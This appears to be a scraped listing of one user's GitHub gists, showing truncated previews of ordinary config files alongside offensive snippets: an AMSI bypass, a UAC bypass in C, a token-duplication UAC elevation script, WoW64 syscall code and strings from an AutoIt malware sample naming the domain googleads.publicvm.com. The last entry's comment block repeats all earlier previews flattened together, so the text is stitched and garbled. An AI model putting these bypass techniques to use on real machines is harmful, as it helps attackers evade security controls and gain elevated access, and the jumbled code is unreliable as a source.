SkyN9ne SkyN9ne

## UbuntuWSL-bashrc.SH
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
  # for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace

## install.sh
#!/usr/bin/env bash

PREFIX=${PREFIX:-/usr/local}

set -eo pipefail

if ! which gh >/dev/null; then
    echo "gh is not installed. Please install gh and try again."
    echo "See https://github.com/cli/cli"
    exit 1

## GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
# Windows God Mode

Create a folder anywhere you want a shortcut to
every setting imaginable called `GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}`

That's it. I got this from Twitter or something.

## .editorconfig
[*]
charset = utf-8
end_of_line = lf
indent_size = 2
indent_style = space
insert_final_newline = true
trim_trailing_whitespace = true
quote_type = single

### Frontend files

## amsi-bypass.ps1
$Win32 = @"
using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]

## Malware.au3
Global $susp_domain_1 = "googleads.publicvm.com"
Global $int_223 = 223
Global $string_C:\MicrosoftSecurity = "C:\MicrosoftSecurity"
Global $susp_file_lnk_1 = "MicrosoftCMD.lnk"
Global $string_microsoft = "Microsoft"
Global $string_microsoftsecurity = "Microsoft Security"
Global $string_microsoftsecurity_exe = "MicrosoftSecurity.exe"
Global $int_4 = 4
Global $string_vbs = "vbs"
Local $string_zeus = "Zeus"

## deobfuscate.py
#!/usr/bin/env python

def deobfuscate_strings(numbers_string, substract_number):
    result = ''

    numbers_list = numbers_string.split('.')

    for number in numbers_list:
        result = result + chr(int(number) - int(substract_number))

## WoW64_call.cpp
#include "stdafx.h"

#define DB(_val_) __asm __emit (_val_)

#define INVALID_SYSCALL (DWORD)(-1)

// code selectors
#define CS_32   0x23
#define CS_64   0x33

## uac_bypass.c
void TestCopy()
{
    BOOL                cond = FALSE;
    IFileOperation     *FileOperation1 = NULL;
    IShellItem         *isrc = NULL, *idst = NULL;
    BIND_OPTS3          bop;
    SHELLEXECUTEINFOW   shexec;
    HRESULT             r;

    do {

## UAC-TokenMagic.ps1
function UAC-TokenMagic {
<#
.SYNOPSIS
	Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
	used by the CIA!

	Essentially we duplicate the token of an elevated process, lower it's mandatory
	integrity level, use it to create a new restricted token, impersonate it and
	use the Secondary Logon service to spawn a new process with High IL. Like
	playing hide-and-go-seek with tokens! ;))
	# ~/.bashrc: executed by bash(1) for non-login shells.
	# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
	# for examples

	# If not running interactively, don't do anything
	[ -z "$PS1" ] && return

	# don't put duplicate lines in the history. See bash(1) for more options
	# ... or force ignoredups and ignorespace
	HISTCONTROL=ignoredups:ignorespace
	#!/usr/bin/env bash

	PREFIX=${PREFIX:-/usr/local}

	set -eo pipefail

	if ! which gh >/dev/null; then
	echo "gh is not installed. Please install gh and try again."
	echo "See https://github.com/cli/cli"
	exit 1
	# Windows God Mode

	Create a folder anywhere you want a shortcut to
	every setting imaginable called `GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}`

	That's it. I got this from Twitter or something.
	[*]
	charset = utf-8
	end_of_line = lf
	indent_size = 2
	indent_style = space
	insert_final_newline = true
	trim_trailing_whitespace = true
	quote_type = single

	### Frontend files
	$Win32 = @"
	using System;
	using System.Runtime.InteropServices;

	public class Win32 {

	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

	[DllImport("kernel32")]
	Global $susp_domain_1 = "googleads.publicvm.com"
	Global $int_223 = 223
	Global $string_C:\MicrosoftSecurity = "C:\MicrosoftSecurity"
	Global $susp_file_lnk_1 = "MicrosoftCMD.lnk"
	Global $string_microsoft = "Microsoft"
	Global $string_microsoftsecurity = "Microsoft Security"
	Global $string_microsoftsecurity_exe = "MicrosoftSecurity.exe"
	Global $int_4 = 4
	Global $string_vbs = "vbs"
	Local $string_zeus = "Zeus"
	#!/usr/bin/env python

	def deobfuscate_strings(numbers_string, substract_number):
	result = ''

	numbers_list = numbers_string.split('.')

	for number in numbers_list:
	result = result + chr(int(number) - int(substract_number))
	#include "stdafx.h"

	#define DB(_val_) __asm __emit (_val_)

	#define INVALID_SYSCALL (DWORD)(-1)

	// code selectors
	#define CS_32 0x23
	#define CS_64 0x33
	void TestCopy()
	{
	BOOL cond = FALSE;
	IFileOperation *FileOperation1 = NULL;
	IShellItem isrc = NULL, idst = NULL;
	BIND_OPTS3 bop;
	SHELLEXECUTEINFOW shexec;
	HRESULT r;

	do {
	function UAC-TokenMagic {
	<#
	.SYNOPSIS
	Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
	used by the CIA!

	Essentially we duplicate the token of an elevated process, lower it's mandatory
	integrity level, use it to create a new restricted token, impersonate it and
	use the Secondary Logon service to spawn a new process with High IL. Like
	playing hide-and-go-seek with tokens! ;))